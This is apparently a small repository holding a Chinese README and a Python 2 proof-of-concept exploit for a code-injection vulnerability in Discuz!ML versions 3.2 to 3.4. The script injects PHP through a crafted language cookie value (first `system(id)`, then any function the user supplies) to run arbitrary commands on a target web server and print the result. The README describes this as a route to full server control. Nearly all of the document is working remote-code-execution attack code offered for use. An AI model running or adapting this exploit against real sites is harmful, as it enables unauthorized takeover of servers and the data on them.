├── README.md
└── discuz3.x_poc.py


/README.md:
--------------------------------------------------------------------------------
 1 | ### Discuz ML! V3.X存在代码注入漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限。
 2 | #### 漏洞影响版本：
 3 | 
 4 | - Discuz!ML v.3.4
 5 | - Discuz!ML v.3.2 
 6 | - Discuz!ML v.3.3
 7 | 
 8 | Usage: ``python poc.py <url> <php function>``
 9 | ```
10 | python discuz3.x_poc.py url system(id)
11 | ```
12 | 
13 | ### Author: heyzm
14 | 


--------------------------------------------------------------------------------
/discuz3.x_poc.py:
--------------------------------------------------------------------------------
 1 | # -*- coding:utf-8 -*-
 2 | # Discuz ML! V3.X存在代码注入漏洞，攻击者通过精心构建的请求报文可以直接执行恶意的PHP代码，进一步可获取整个网站的服务器权限。
 3 | # 漏洞影响版本：
 4 | # Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3
 5 | # Author: heyzm
 6 | # 
 7 | # 
 8 | import requests,sys
 9 | from requests.packages import urllib3
10 | 
11 | headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"}
12 | 
13 | def poc(url,eexec):
14 | 	flag = url
15 | 	if "http://" in url or "https://" in url:
16 | 		url = url+'/portal.php'
17 | 	else:
18 | 		url = 'http://'+url+'/portal.php'
19 | 	urllib3.disable_warnings()	
20 | 	try:
21 | 		sign = requests.get(url,verify=False).headers['Set-cookie'][:9]
22 | 	except:
23 | 		print '%s not is vulnerable!' % flag
24 | 		sys.exit()
25 | 	cookie = "%s_saltkey=V2rU23EB;%s_language=en'.system(id).';%s_lastvisit=1562777028;%s=rrh6or;%s_lastact=1562780628%%09portal.php%%09;%s_sid=rrh6or" % (sign,sign,sign,sign,sign,sign)
26 | 	res = requests.get(url,headers=headers,cookies={"Cookie":cookie},timeout=5,verify=False)
27 | 	if 'groups=' not in res.text:
28 | 		print '%s not is vulnerable!' % flag
29 | 		sys.exit()
30 | 	else:
31 | 		cookie = "%s_saltkey=V2rU23EB;%s_language=en'.%s.';%s_lastvisit=1562777028;%s=rrh6or;%s_lastact=1562780628%%09portal.php%%09;%s_sid=rrh6or" % (sign,sign,eexec,sign,sign,sign,sign)
32 | 		res = requests.get(url,headers=headers,cookies={"Cookie":cookie},timeout=5,verify=False)
33 | 		flag = res.text.index('<!DOCTYPE html')
34 | 		print res.text[:flag]
35 | 	
36 | if __name__ == '__main__':
37 | 	if len(sys.argv) <=2:
38 | 		print 'Usage: python poc.py <url> <php function>'
39 | 		sys.exit()
40 | 	else:
41 | 		poc(sys.argv[1],sys.argv[2])
42 | 


--------------------------------------------------------------------------------